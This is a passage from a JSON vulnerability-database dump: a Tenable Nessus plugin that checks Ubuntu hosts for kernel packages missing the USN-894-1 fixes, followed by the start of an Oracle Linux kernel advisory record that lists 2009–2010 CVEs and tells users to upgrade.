"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-k8", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-openvz", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.15", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.28", "cpe:/o:canonical:ubuntu_linux:8.10", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-openvz", "p-cpe:/a:canonical:ubuntu_linux:linux-ec2-doc", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:linux-ec2-source-2.6.31", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-686", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.15", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-686", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-xen", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.31", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.24"], "id": "UBUNTU_USN-894-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44399", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-894-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44399);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/28 22:47:45\");\n\n script_cve_id(\"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4031\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0291\");\n script_bugtraq_id(37069, 37339, 37906);\n script_xref(name:\"USN\", value:\"894-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : linux, linux-source-2.6.15 vulnerabilities (USN-894-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\nfilesystems did not correctly check certain disk structures. If a user\nwere tricked into mounting a specially crafted filesystem, a remote\nattacker could crash the system or gain root privileges.\n(CVE-2009-4020, CVE-2009-4308)\n\nIt was discovered that FUSE did not correctly check certain requests.\nA local attacker with access to FUSE mounts could exploit this to\ncrash the system or possibly gain root privileges. Ubuntu 9.10 was not\naffected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest\ninstructions. A local attacker in a guest could exploit this to\ntrigger high scheduling latency in the host, leading to a denial of\nservice. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n\nIt was discovered that the OHCI fireware driver did not correctly\nhandle certain ioctls. A local attacker could exploit this to crash\nthe system, or possibly gain root privileges. Ubuntu 6.06 was not\naffected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle\nO_ASYNC on locked files. A local attacker could exploit this to gain\nroot privileges. Only Ubuntu 9.04 and 9.10 were affected.\n(CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e\nnetwork drivers did not correctly check the size of Ethernet frames.\nAn attacker on the local network could send specially crafted traffic\nto bypass packet filters, crash the system, or possibly gain root\nprivileges. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that 'print-fatal-signals' reporting could show\narbitrary kernel memory contents. A local attacker could exploit this,\nleading to a loss of privacy. By default this is disabled in Ubuntu\nand did not affect Ubuntu 6.06. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\nhandle jumbo frames. A remote attacker could exploit this to crash the\nsystem, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were\naffected. (CVE-2010-0006)\n\nFlorian Westphal discovered that bridging netfilter rules could be\nmodified by unprivileged users. A local attacker could disrupt network\ntraffic, leading to a denial of service. (CVE-2010-0007)\n\nAl Viro discovered that certain mremap operations could leak kernel\nmemory. A local attacker could exploit this to consume all available\nmemory, leading to a denial of service. (CVE-2010-0291).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/894-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.28\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-source-2.6.31\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-dove\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-dove-z0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpiacompat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.28\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.31\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-doc-2.6.15\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-386\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-686\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-generic\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-k8\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-xeon\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-386\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-686\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-generic\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-k8\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-xeon\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-kernel-devel\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-source-2.6.15\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-doc-2.6.24\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-386\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-generic\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-openvz\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-rt\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-server\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-virtual\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-xen\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-386\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-generic\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-lpia\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-lpiacompat\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-openvz\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-rt\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-server\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-virtual\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-xen\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-386\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-generic\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-server\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-virtual\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-kernel-devel\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-source-2.6.24\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-doc-2.6.27\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-17\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-17-generic\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-17-server\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-17-generic\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-17-server\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-17-virtual\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-source-2.6.27\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-doc-2.6.28\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-headers-2.6.28-18\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-headers-2.6.28-18-generic\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-headers-2.6.28-18-server\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-generic\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-lpia\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-server\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-versatile\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-virtual\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-source-2.6.28\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-doc\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-ec2-doc\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-ec2-source-2.6.31\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-386\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-generic\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-generic-pae\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-server\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-304\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-304-ec2\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-386\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-generic\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-generic-pae\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-lpia\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-server\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-virtual\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-211-dove\", pkgver:\"2.6.31-211.22\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-211-dove-z0\", pkgver:\"2.6.31-211.22\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-304-ec2\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-source-2.6.31\", pkgver:\"2.6.31-19.56\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc / linux-doc-2.6.15 / linux-doc-2.6.24 / linux-doc-2.6.27 / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:51:22", "references": ["https://oss.oracle.com/pipermail/el-errata/2010-January/001335.html"], "pluginID": "67988", "description": "From Red Hat Security Advisory 2010:0046 :\n\nUpdated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user could send a specially crafted IOCTL request that would cause a denial of service or, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on memory, fuse_put_request() could dereference an invalid pointer, possibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243 update introduced two flaws in the routing implementation. If an attacker was able to cause a large enough number of collisions in the routing hash table (via specially crafted packets) for the emergency route flush to trigger, a deadlock could occur. Secondly, if the kernel routing cache was disabled, an uninitialized pointer would be left behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the do_coredump() function. A local attacker able to guess the file name a process is going to dump its core to, prior to the process crashing, could use this flaw to append data to the dumped core file. This issue only affects systems that have '/proc/sys/fs/suid_dumpable' set to 2 (the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable set to 2, the core file will not be recorded if the file already exists. For example, core files will not be overwritten on subsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems, 32-bit processes could access and read certain 64-bit registers by temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV) support in the qla2xxx driver, resulting in two new sysfs pseudo files, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and 'vport_delete'. These two files were world-writable by default, allowing a local user to change SCSI host attributes. This flaw only affects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The 'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/') had world-writable permissions. This could allow local, unprivileged users to change the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver used for OHCI compliant IEEE 1394 controllers. A local, unprivileged user with access to /dev/fw* files could issue certain IOCTL calls, causing a denial of service or privilege escalation. The FireWire modules are blacklisted by default, and if enabled, only root has access to the files noted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the HFS file system implementation. This could lead to a denial of service if a user browsed a specially crafted HFS file system, for example, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from www.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update / index.html\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 8, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2010-0046)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux 